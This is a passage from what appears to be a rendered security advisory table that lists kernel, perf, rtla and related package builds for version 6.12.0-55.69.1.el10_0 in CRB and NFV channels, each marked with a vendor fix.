| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
